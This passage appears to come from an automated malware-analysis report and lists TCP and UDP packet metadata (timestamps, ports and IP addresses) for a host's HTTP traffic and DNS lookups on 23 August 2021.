Aug 23, 2021 02:09:19.344213963 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344302893 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344414949 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344470978 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344486952 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344500065 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344585896 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344626904 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344643116 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344657898 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344742060 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344825029 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344841003 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344902992 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344918013 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.344980001 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.345019102 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.345058918 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.345105886 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.345184088 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369283915 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369312048 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369327068 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369339943 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369354010 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.369820118 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.370198965 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.370218992 CEST	80	49869	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.370265007 CEST	49869	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.370285988 CEST	49869	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.370398045 CEST	49869	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.370443106 CEST	49869	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.381596088 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.381711960 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.381903887 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382088900 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382272005 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382414103 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382564068 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382746935 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.382900000 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.383053064 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.383233070 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.383384943 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.383491039 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.396001101 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.396027088 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.396214008 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.441701889 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.441745043 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.441776037 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.441803932 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442255020 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442270041 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442284107 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442297935 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442431927 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442445993 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442528963 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442543030 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442646027 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442689896 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442749023 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.442934990 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443007946 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443090916 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443137884 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443491936 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443603992 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443665028 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443731070 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443861961 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443876028 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.443890095 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.491621017 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.491709948 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.515367985 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.541598082 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.541623116 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.541729927 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.541773081 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.660224915 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.686582088 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.686618090 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.686709881 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.686732054 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.734637976 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.734766006 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.734993935 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.735207081 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.759696007 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:19.759756088 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:19.759869099 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:19.759875059 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:19.760066986 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:19.760108948 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.760164976 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:19.760395050 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.760430098 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.760516882 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.760550976 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.760569096 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.760607004 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.760698080 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.760731936 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786072969 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786124945 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786159992 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786238909 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786309004 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786367893 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786578894 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786617041 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786650896 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786686897 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786736965 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786900997 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786909103 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786941051 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786948919 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.786973953 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.786976099 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.787106991 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.787177086 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.787246943 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.794883013 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.811748028 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.811897039 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812176943 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812325001 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812525034 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812581062 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812717915 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812845945 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.812992096 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813129902 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813723087 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813740969 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813755035 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813767910 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813782930 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813908100 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813924074 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.813972950 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.814140081 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.814273119 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.815283060 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.815304995 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.815376043 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.815406084 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.815749884 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.815857887 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.818439960 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.818686008 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.818890095 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.819252014 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.819560051 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.819591045 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.819978952 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820008993 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820025921 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820080042 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.820760965 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.820769072 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820799112 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820816994 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.820826054 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.821765900 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.840951920 CEST	80	49868	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.841025114 CEST	49868	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.846968889 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.849086046 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.849127054 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.849183083 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.849210978 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.878961086 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879013062 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879045963 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879139900 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879319906 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879354000 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879406929 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879811049 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879894018 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879930019 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879961014 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.879992008 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880172014 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880208015 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880654097 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880769014 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880937099 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.880974054 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881004095 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881210089 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881241083 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881272078 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881367922 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881403923 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881534100 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.881553888 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.917362928 CEST	80	49867	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:19.917407990 CEST	80	49867	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:19.917517900 CEST	49867	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:19.917591095 CEST	49867	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:19.929966927 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:19.930088043 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:19.963277102 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.989562988 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.989650011 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:19.991153955 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:19.991197109 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:20.103866100 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:20.129825115 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:20.129852057 CEST	80	49870	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:20.129955053 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:20.129988909 CEST	49870	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:20.221143007 CEST	80	49867	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:48.872266054 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:48.872330904 CEST	49862	80	192.168.2.3	185.215.113.206

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2021 02:07:01.015873909 CEST	56777	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:01.056262970 CEST	53	56777	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:01.161201954 CEST	58643	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:01.196121931 CEST	53	58643	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:01.323837042 CEST	60985	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:01.348452091 CEST	53	60985	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:03.025923967 CEST	50200	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:03.060983896 CEST	53	50200	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:03.077467918 CEST	51281	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:03.117980003 CEST	53	51281	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:06.889020920 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:06.925810099 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:28.915364981 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:28.952630043 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:37.244759083 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:37.279818058 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:50.490118027 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:50.534657001 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:50.570710897 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:51.579727888 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:52.595510960 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:54.619680882 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:54.634759903 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:54.814737082 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:55.747823954 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:56.036282063 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:56.071549892 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:56.638187885 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:57.367733955 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:57.399835110 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 23, 2021 02:07:58.507656097 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:07:58.816405058 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:00.052691936 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:00.124970913 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:00.802826881 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:00.835565090 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:01.229237080 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:01.264164925 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:02.842709064 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:02.890280008 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:03.184628010 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:03.219505072 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:03.250847101 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:03.285758018 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:03.797610044 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:03.830378056 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:03.978363991 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:04.028274059 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:04.251380920 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:04.286461115 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:04.822979927 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:04.851032019 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:05.656336069 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:05.692020893 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:06.413086891 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:06.446305990 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:06.833664894 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:06.865937948 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:07.648027897 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:07.675353050 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:09.244616985 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:09.279850960 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:10.816901922 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:10.849088907 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:14.758996964 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:14.801264048 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:33.274183035 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:33.301907063 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:34.470122099 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:34.505701065 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:35.967782974 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:36.275801897 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:38.276667118 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:38.311517954 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:39.514575005 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:39.546825886 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:41.933979034 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:41.966301918 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:43.130424023 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:43.166605949 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:44.702106953 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:44.729334116 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:47.390358925 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:47.425410986 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:48.911514997 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:48.936439991 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:50.402153015 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:50.435395956 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:51.989214897 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:52.015902996 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:52.843419075 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:52.884622097 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:53.649127007 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:53.678139925 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:55.222528934 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:55.256870031 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:57.538966894 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:57.572257996 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:57.709592104 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:57.742419958 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:57.902708054 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:57.936482906 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:58.627418995 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:58.677392960 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 23, 2021 02:08:58.808264971 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:08:58.843041897 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:00.404898882 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:00.440097094 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:01.956758976 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:01.992798090 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 23, 2021 02:09:07.312016964 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 23, 2021 02:09:07.344168901 CEST	53	64124	8.8.8.8	192.168.2.3
